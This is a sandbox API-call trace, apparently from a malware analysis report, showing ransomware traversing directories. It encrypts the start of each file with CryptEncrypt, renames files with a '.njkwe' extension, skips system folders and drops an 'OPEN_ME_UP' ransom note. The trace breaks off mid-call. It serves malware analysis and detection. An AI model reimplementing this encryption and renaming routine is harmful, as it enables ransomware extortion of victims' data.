[0062.074] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0062.075] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0062.075] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Extended\\.") returned 36 [0062.075] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.075] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf378ed8a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0062.075] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0062.075] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0062.075] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0062.075] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0062.075] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0062.075] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Extended\\..") returned 37 [0062.075] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0062.075] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.075] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2a714f00, ftCreationTime.dwHighDateTime=0x1cac6f0, ftLastAccessTime.dwLowDateTime=0x2a714f00, ftLastAccessTime.dwHighDateTime=0x1cac6f0, ftLastWriteTime.dwLowDateTime=0x2a714f00, ftLastWriteTime.dwHighDateTime=0x1cac6f0, nFileSizeHigh=0x0, nFileSizeLow=0x16c82, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Parameterinfo.xml", cAlternateFileName="PARAME~1.XML")) returned 1 [0062.075] lstrcmpiW (lpString1="Parameterinfo.xml", lpString2="Windows") returned -1 [0062.075] lstrcmpiW (lpString1="Parameterinfo.xml", lpString2="$Recycle.bin") returned 1 [0062.075] lstrcmpiW (lpString1="Parameterinfo.xml", lpString2="System Volume Information") returned -1 [0062.075] lstrcmpiW (lpString1="Parameterinfo.xml", lpString2="Program Files") returned -1 [0062.075] lstrcmpiW (lpString1="Parameterinfo.xml", lpString2="Program Files (x86)") returned -1 [0062.075] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml") returned 52 [0062.075] StrStrIW (lpFirst="Parameterinfo.xml", lpSrch=".njkwe") returned 0x0 [0062.075] lstrcmpW (lpString1="Parameterinfo.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0062.075] lstrcmpW (lpString1="Parameterinfo.xml", lpString2="taridd") returned -1 [0062.075] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0062.075] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0062.075] GetTickCount () returned 0x114ff12 [0062.075] GetTickCount () returned 0x114ff12 [0062.075] GetTickCount () returned 0x114ff12 [0062.075] GetTickCount () returned 0x114ff12 [0062.075] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0062.076] GetProcessHeap () returned 0xbe0000 [0062.076] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0062.076] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0062.077] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.078] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0062.078] GetProcessHeap () returned 0xbe0000 [0062.078] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0062.078] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.078] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0062.078] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0062.078] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0062.078] CloseHandle (hObject=0x42c) returned 1 [0062.081] GetProcessHeap () returned 0xbe0000 [0062.081] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0062.081] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml_r00t_{3sXlE5}.njkwe") returned 72 [0062.081] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\extended\\parameterinfo.xml_r00t_{3sxle5}.njkwe")) returned 1 [0062.082] GetProcessHeap () returned 0xbe0000 [0062.082] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0062.082] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x988a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="UiInfo.xml", cAlternateFileName="")) returned 1 [0062.082] lstrcmpiW (lpString1="UiInfo.xml", lpString2="Windows") returned -1 [0062.082] lstrcmpiW (lpString1="UiInfo.xml", lpString2="$Recycle.bin") returned 1 [0062.082] lstrcmpiW (lpString1="UiInfo.xml", lpString2="System Volume Information") returned 1 [0062.082] lstrcmpiW (lpString1="UiInfo.xml", lpString2="Program Files") returned 1 [0062.082] lstrcmpiW (lpString1="UiInfo.xml", lpString2="Program Files (x86)") returned 1 [0062.082] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Extended\\UiInfo.xml") returned 45 [0062.082] StrStrIW (lpFirst="UiInfo.xml", lpSrch=".njkwe") returned 0x0 [0062.082] lstrcmpW (lpString1="UiInfo.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0062.082] lstrcmpW (lpString1="UiInfo.xml", lpString2="taridd") returned 1 [0062.082] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Extended\\UiInfo.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0062.082] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0062.082] GetTickCount () returned 0x114ff22 [0062.082] GetTickCount () returned 0x114ff22 [0062.082] GetTickCount () returned 0x114ff22 [0062.082] GetTickCount () returned 0x114ff22 [0062.083] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0062.083] GetProcessHeap () returned 0xbe0000 [0062.083] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0062.083] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0062.084] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.085] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0062.085] GetProcessHeap () returned 0xbe0000 [0062.085] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0062.085] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.085] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0062.085] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0062.085] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0062.085] CloseHandle (hObject=0x42c) returned 1 [0062.087] GetProcessHeap () returned 0xbe0000 [0062.087] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0062.087] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Extended\\UiInfo.xml_r00t_{3sXlE5}.njkwe") returned 65 [0062.087] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\UiInfo.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\extended\\uiinfo.xml_r00t_{3sxle5}.njkwe")) returned 1 [0062.087] GetProcessHeap () returned 0xbe0000 [0062.087] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0062.087] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x988a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="UiInfo.xml", cAlternateFileName="")) returned 0 [0062.087] FindClose (in: hFindFile=0xc1a320 | out: hFindFile=0xc1a320) returned 1 [0062.087] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Extended\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 66 [0062.087] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Extended\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\extended\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0062.089] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0062.090] CloseHandle (hObject=0x428) returned 1 [0062.090] GetProcessHeap () returned 0xbe0000 [0062.090] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0062.090] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Graphics", cAlternateFileName="")) returned 1 [0062.090] lstrcmpiW (lpString1="Graphics", lpString2="Windows") returned -1 [0062.090] lstrcmpiW (lpString1="Graphics", lpString2="$Recycle.bin") returned 1 [0062.090] lstrcmpiW (lpString1="Graphics", lpString2="System Volume Information") returned -1 [0062.090] lstrcmpiW (lpString1="Graphics", lpString2="Program Files") returned -1 [0062.090] lstrcmpiW (lpString1="Graphics", lpString2="Program Files (x86)") returned -1 [0062.090] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics") returned 34 [0062.090] lstrcmpW (lpString1="Graphics", lpString2=".") returned 1 [0062.090] lstrcmpW (lpString1="Graphics", lpString2="..") returned 1 [0062.090] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\Graphics", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0062.090] GetProcessHeap () returned 0xbe0000 [0062.090] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0062.090] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\*") returned 36 [0062.090] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a120 [0062.131] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0062.131] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0062.131] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0062.132] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0062.132] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0062.132] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\.") returned 36 [0062.132] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.132] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0062.132] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0062.132] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0062.132] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0062.132] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0062.132] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0062.132] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\..") returned 37 [0062.132] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0062.132] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.132] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Print.ico", cAlternateFileName="")) returned 1 [0062.132] lstrcmpiW (lpString1="Print.ico", lpString2="Windows") returned -1 [0062.132] lstrcmpiW (lpString1="Print.ico", lpString2="$Recycle.bin") returned 1 [0062.132] lstrcmpiW (lpString1="Print.ico", lpString2="System Volume Information") returned -1 [0062.132] lstrcmpiW (lpString1="Print.ico", lpString2="Program Files") returned -1 [0062.132] lstrcmpiW (lpString1="Print.ico", lpString2="Program Files (x86)") returned -1 [0062.132] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 44 [0062.132] StrStrIW (lpFirst="Print.ico", lpSrch=".njkwe") returned 0x0 [0062.132] lstrcmpW (lpString1="Print.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0062.132] lstrcmpW (lpString1="Print.ico", lpString2="taridd") returned -1 [0062.132] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Print.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0062.132] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Print.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0062.133] GetTickCount () returned 0x114ff50 [0062.133] GetTickCount () returned 0x114ff50 [0062.133] GetTickCount () returned 0x114ff50 [0062.133] GetTickCount () returned 0x114ff50 [0062.133] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0062.133] GetProcessHeap () returned 0xbe0000 [0062.133] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0062.133] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x47e, lpOverlapped=0x0) returned 1 [0062.135] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xfffffb82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.135] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x47e, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x47e, lpOverlapped=0x0) returned 1 [0062.135] GetProcessHeap () returned 0xbe0000 [0062.135] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0062.135] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.135] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0062.135] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0062.136] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0062.136] CloseHandle (hObject=0x42c) returned 1 [0062.137] GetProcessHeap () returned 0xbe0000 [0062.137] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0062.137] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Print.ico_r00t_{3sXlE5}.njkwe") returned 64 [0062.137] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Print.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Print.ico_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico_r00t_{3sxle5}.njkwe")) returned 1 [0062.137] GetProcessHeap () returned 0xbe0000 [0062.137] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0062.137] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Rotate1.ico", cAlternateFileName="")) returned 1 [0062.137] lstrcmpiW (lpString1="Rotate1.ico", lpString2="Windows") returned -1 [0062.137] lstrcmpiW (lpString1="Rotate1.ico", lpString2="$Recycle.bin") returned 1 [0062.137] lstrcmpiW (lpString1="Rotate1.ico", lpString2="System Volume Information") returned -1 [0062.137] lstrcmpiW (lpString1="Rotate1.ico", lpString2="Program Files") returned 1 [0062.137] lstrcmpiW (lpString1="Rotate1.ico", lpString2="Program Files (x86)") returned 1 [0062.137] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 46 [0062.137] StrStrIW (lpFirst="Rotate1.ico", lpSrch=".njkwe") returned 0x0 [0062.138] lstrcmpW (lpString1="Rotate1.ico", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0062.138] lstrcmpW (lpString1="Rotate1.ico", lpString2="taridd") returned -1 [0062.138] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0062.138] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0062.138] GetTickCount () returned 0x114ff50 [0062.138] GetTickCount () returned 0x114ff50 [0062.138] GetTickCount () returned 0x114ff50 [0062.138] GetTickCount () returned 0x114ff50 [0062.138] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0062.138] GetProcessHeap () returned 0xbe0000 [0062.138] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0062.138] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x37e, lpOverlapped=0x0) returned 1 [0062.139] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xfffffc82, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.140] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x37e, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x37e, 